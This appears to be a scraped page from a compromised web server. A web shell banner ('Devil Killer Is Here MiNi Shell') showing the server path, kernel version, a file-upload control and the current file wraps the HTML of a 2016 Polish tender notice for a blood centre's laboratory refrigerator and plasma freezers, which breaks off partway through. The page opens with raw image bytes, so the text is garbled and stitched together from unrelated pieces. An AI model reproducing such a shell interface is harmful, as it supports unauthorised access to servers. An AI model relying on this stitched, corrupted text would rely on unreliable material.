JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160304/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160304/48860-N-2016.html

<p class="kh_header"><b>Warszawa: Przedmiotem zamówienia jest dostawa chłodziarki laboratoryjnej i urządzeń do schładzania 
i przechowywania FFP</b><br>
<b>Numer ogłoszenia: 48860 - 2016; data zamieszczenia: 04.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa SP ZOZ , ul. Koszykowa 78, 00-671 Warszawa, woj. mazowieckie, tel. 261 845 557, faks 261 845 135.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wckik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa chłodziarki laboratoryjnej i urządzeń do schładzania 
i przechowywania FFP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet nr 1:Urządzenie do schładzania 
i przechowywania FFP. Wielkość zamówienia: 2 sztuki. 1.	Posiada znak CE.
2.	Budowa szafowa z komorą chłodzenia zamykaną dwójką drzwi zewnętrznych o układzie góra-dół.
3.	Umożliwia przechowywanie zamrożonego osocza w przedziale temperaturowym od - 25 oC do - 40oC, z dokładnością regulacji temperatury +/- 1 oC.
4.	Wyposażone w sterownik mikroprocesorowy z zewnętrznym odczytem cyfrowym.
5.	Pojemność: 480 +/- 10 litrów.
6.	Wyposażone w sygnalizację alarmową wizualną i dźwiękową o stanach awaryjnych: przekroczenia dopuszczalnej temperatury, zaniku napięcia.
7.	Wyposażone w pojemniki dostosowane do wymiarów półek, w minimalnej ilości 10 szt.
8.	Wymiary zewnętrzne nie przekraczają zakresu: 80-85 cm x 75-80 cm x 175-195 cm (szer. x głęb. x wys.).
9.	Wnętrze komory wykonano ze stali nierdzewnej lub materiału równoważnego, odpornego na środki dezynfekcyjne.
10.	System chłodzenia musi być wyposażony w ekologiczny czynnik chłodniczy wolny od CFC.
11.	Zasilane prądem zmiennym 230V.
12.	Urządzenie zapewnia możliwość podłączenia do centralnego monitoringu temperatury.
13.	Urządzenie będące wyrobem medycznym zgodnym z dyrektywą 93/42/EEC i 2007/47/EC posiadającym stosowną deklarację zgodności
14.	Wykonawca zapewnia autoryzowany serwis na terenie Polski.
15.	Wykonawca zapewnia bezpłatną instalację i bezpłatne szkolenie personelu nie później niż 7 dni od dostawy lub zgłoszenia takiej potrzeby przez zamawiającego.
16.	Wykonawca zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez zamawiającego.
17.	Wykonawca dostarcza wraz z urządzeniem instrukcję obsługi w języku polskim.
18.	Wykonawca udziela minimum 24 miesiące gwarancji na urządzenie.
19.	W okresie gwarancyjnym Wykonawca zobowiązuje się do minimum 2 bezpłatnych (obejmujących koszty robocizny, dojazdu, materiałów zużywalnych) przeglądów gwarancyjnych w okresach wskazanych przez zamawiającego.
20.	Czas reakcji serwisu w okresie gwarancji nie przekracza 48 godzin.
21.	Czas naprawy na terenie Polski - 7 dni.
22.	Na czas naprawy powyżej 7 dni Wykonawca zapewnia urządzenie zastępcze o parametrach równoważnych z naprawianym.Wymagane w ofercie dokumenty: -   deklaracja zgodności potwierdzająca oznakowanie wyrobu znakiem CE lub dokument równoważny,
-instrukcja w języku polskim,
-specyfikacja techniczna producenta zaoferowanego powyżej urządzenia.
Pakiet Nr 2:Chłodziarka laboratoryjna. Wielkość zamówienia: 1 sztuka. Charakterystyka jakościowa i techniczna sprzętu:
1.	posiada znak CE,
2.	musi być przystosowana do przechowywania odczynników analitycznych  w przedziale temperaturowym od + 2 do + 8 o C, dopuszczalne odchylenie temperatury +/-1o C,
3.	musi posiadać budowę szafową z komorą chłodzenia o objętości od 470 do 490 litrów, 
4.	wymiary zewnętrzne nie mogą przekroczyć następujących wartości (szer. x głęb. x wys.) 90x60x180 cm,
5.	musi być wyposażona w co najmniej 5 półek drucianych pokrytych poliestrem (min. obciążenie 1 półki 30 kg),
6.	musi posiadać dwójkę drzwi przesuwanych, przeszklonych o co najmniej podwójnej warstwie szkła z możliwością zamykania na klucz,
7.	musi posiadać wewnętrzne oświetlenie,
8.	posiada system chłodzenia z wymuszonym obiegiem powietrza,
9.	musi być wyposażone w mikroprocesorowy układ sterowania z zewnętrznym wyświetlaczem typu LED,
10.	musi posiadać automatyczny system oszraniania nie powodujący zmian temperatury w komorze chłodniczej,
11.	wnętrze komory wykonane ze stali nierdzewnej,
12.	urządzenie musi posiadać co najmniej dwa kółka ułatwiające przemieszczanie,
13.	musi zapewniać możliwość podłączenia do centralnego monitoringu temperatury (posiada port dostępu na wprowadzenie czujnika temperatury)
14.	wyposażone jest w graficzny rejestrator temperatury,
15.	musi być wyposażone w sygnalizację alarmową wizualną i dźwiękową o stanach awaryjnych: przekroczenia dopuszczalnej temperatury, zanik napięcia,
16.	musi posiadać ekologiczny czynnik chłodniczy wolny od CFC,
17.	system sterowania pracą sprężarki i system chłodzenia musi być cichy i niezawodny,
18.	zasilanie prądem zmiennym 230 V, 
19.	Wykonawca  musi zapewnić autoryzowany serwis na terenie Polski,
20.	Wykonawca musi zapewnić bezpłatną instalację i bezpłatne szkolenie zakończone podpisaniem protokołu przekazania personelu nie później niż 7 dni od dostawy lub zgłoszenia takiej potrzeby przez zamawiającego,
21.	Wykonawca  zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez zamawiającego,
22.	Wykonawca  musi dostarczyć  wraz z urządzeniem instrukcję obsługi w języku polskim,
23.	Wykonawca  musi udzielić minimum 24 miesięcznej gwarancji na urządzenie,
24.	w okresie gwarancji Wykonawca  zobowiązuje się do minimum 2 bezpłatnych (obejmujących koszt robocizny, dojazdu, materiałów zużywalnych) przeglądów gwarancyjnych w okresach wskazanych przez zamawiającego , 
25.	czas reakcji serwisu w okresie gwarancji nie może przekraczać 48 godzin,
26.	czas naprawy na terenie Polski - 7 dni,
27.	na czas naprawy powyżej 7 dni dostawca zapewnia urządzenie zastępcze o parametrach równoważnych z naprawianym,
Wymagane w ofercie dokumenty: -   deklaracja zgodności potwierdzająca oznakowanie wyrobu znakiem CE lub dokument równoważny,
-instrukcja w języku polskim,
-specyfikacja techniczna producenta zaoferowanego powyżej urządzenia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.51.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Obowiązek wniesienia wadium:1. Przystępując do postępowania wykonawca jest obowiązany wnieść wadium w wysokości: Pakiety nr 1 - 1200,00pln, Pakiet nr 2 - 500,00pln. 2. Wadium nalezy wnieść przed upływem terminu składania ofert. 3. Wadium może być wnoszone w: a) w pieniądzu, b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, c) gwarancjach bankowych, d) gwarancjach ubezpieczeniowych, e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42,poz.257). 4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego nr 72 1130 1017 0020 1465 8420 0003 prowadzony przez Bank BGK. Na poleceniu przelewu proszę wpisać: wadium sprawa nr 10/D/2016 Pakiet Nr.......</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez
Zamawiającego, Zamawiający żąda dokumentów określonych w arkuszu asortymentowo-cenowym, stanowiącym Załącznik Nr 4/1, 4/2, do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia spełnienia warunków udziału w postępowaniu do ofert należy załączyć Oświadczenie Wykonawcy zawierające informację czy wybór oferty będzie prowadzić do powstania u zamawiającego obowiązku podatkowego (art. 91 ust. 3a ustawy) wg wzoru na Załączniku Nr 2 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w razie zaistnienia okoliczności:
1.w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, szczególnie zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożące powstaniem szkody niewspółmiernie większej niż spowodowana działaniem lub zaniechaniem;
2.zaistnienie sytuacji pozwalającej na obniżenie kosztów realizacji zamówienia (np. zmniejszenie zakresu robót lub czynności, zastosowania alternatywnych rozwiązań technologicznych);
3.wystąpienia innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny;
4.zmiana w zakresie przedmiotu zamówienia w przypadku wystąpienia okoliczności, których nie dało się przewidzieć w chwili podpisania umowy, niezależnych od wykonawcy;
5.zmiana terminu realizacji umowy w przypadku wystąpienia okoliczności nieleżących po stronie wykonawcy;
6.ustawowej zmiany stawki podatku od towarów i usług VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wckik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojskowe Centrum
Krwiodawstwa i Krwiolecznictwa Samodzielny Publiczny Zakład Opieki Zdrowotnej ul. Koszykowa 78 00-671
Warszawa 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2016 godzina 09:00, miejsce: Wojskowe Centrum
Krwiodawstwa i Krwiolecznictwa Samodzielny Publiczny Zakład Opieki Zdrowotnej ul. Koszykowa 78 00-671
Warszawa 1, Kancelaria ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Urządzenie do schładzania 
i przechowywania FFP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenie do schładzania 
i przechowywania FFP . Wielkość zamówienia : 2 sztuki.1.	Posiada znak CE.
2.Budowa szafowa z komorą chłodzenia zamykaną dwójką drzwi zewnętrznych o układzie góra-dół.
3.Umożliwia przechowywanie zamrożonego osocza w przedziale temperaturowym od - 25 oC do - 40oC, z dokładnością regulacji temperatury +/- 1 oC.
4.Wyposażone w sterownik mikroprocesorowy z zewnętrznym odczytem cyfrowym.
5.Pojemność: 480 +/- 10 litrów.
6.Wyposażone w sygnalizację alarmową wizualną i dźwiękową o stanach awaryjnych: przekroczenia dopuszczalnej temperatury, zaniku napięcia.
7.Wyposażone w pojemniki dostosowane do wymiarów półek, w minimalnej ilości 10 szt.
8.Wymiary zewnętrzne nie przekraczają zakresu: 80-85 cm x 75-80 cm x 175-195 cm (szer. x głęb. x wys.).
9.Wnętrze komory wykonano ze stali nierdzewnej lub materiału równoważnego, odpornego na środki dezynfekcyjne.
10.System chłodzenia musi być wyposażony w ekologiczny czynnik chłodniczy wolny od CFC.
11.Zasilane prądem zmiennym 230V.
12.Urządzenie zapewnia możliwość podłączenia do centralnego monitoringu temperatury.
13.Urządzenie będące wyrobem medycznym zgodnym z dyrektywą 93/42/EEC i 2007/47/EC posiadającym stosowną deklarację zgodności
14.Wykonawca zapewnia autoryzowany serwis na terenie Polski.
15.Wykonawca zapewnia bezpłatną instalację i bezpłatne szkolenie personelu nie później niż 7 dni od dostawy lub zgłoszenia takiej potrzeby przez zamawiającego.
16.Wykonawca zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez zamawiającego.
17.Wykonawca dostarcza wraz z urządzeniem instrukcję obsługi w języku polskim.
18.Wykonawca udziela minimum 24 miesiące gwarancji na urządzenie.
19.W okresie gwarancyjnym Wykonawca zobowiązuje się do minimum 2 bezpłatnych (obejmujących koszty robocizny, dojazdu, materiałów zużywalnych) przeglądów gwarancyjnych w okresach wskazanych przez zamawiającego.
20.Czas reakcji serwisu w okresie gwarancji nie przekracza 48 godzin.
21.Czas naprawy na terenie Polski - 7 dni.
22.Na czas naprawy powyżej 7 dni Wykonawca zapewnia urządzenie zastępcze o parametrach równoważnych z naprawianym.
Wymagane w ofercie dokumenty:
-deklaracja zgodności potwierdzająca oznakowanie wyrobu znakiem CE lub dokument równoważny,
-instrukcja w języku polskim,
-specyfikacja techniczna producenta zaoferowanego powyżej urządzenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.51.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Chłodziarka laboratoryjna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chłodziarka laboratoryjna. Wielkość zamówienia: 1 sztuka. Charakterystyka jakościowa i techniczna sprzętu:
1.posiada znak CE,
2.musi być przystosowana do przechowywania odczynników analitycznych  w przedziale temperaturowym od + 2 do + 8 o C, dopuszczalne odchylenie temperatury +/-1o C,
3.musi posiadać budowę szafową z komorą chłodzenia o objętości od 470 do 490 litrów, 
4.wymiary zewnętrzne nie mogą przekroczyć następujących wartości (szer. x głęb. x wys.) 90x60x180 cm,
5.musi być wyposażona w co najmniej 5 półek drucianych pokrytych poliestrem (min. obciążenie 1 półki 30 kg),
6.musi posiadać dwójkę drzwi przesuwanych, przeszklonych o co najmniej podwójnej warstwie szkła z możliwością zamykania na klucz,
7.musi posiadać wewnętrzne oświetlenie,
8.posiada system chłodzenia z wymuszonym obiegiem powietrza,
9.musi być wyposażone w mikroprocesorowy układ sterowania z zewnętrznym wyświetlaczem typu LED,
10.musi posiadać automatyczny system oszraniania nie powodujący zmian temperatury w komorze chłodniczej,
11.wnętrze komory wykonane ze stali nierdzewnej,
12.urządzenie musi posiadać co najmniej dwa kółka ułatwiające przemieszczanie,
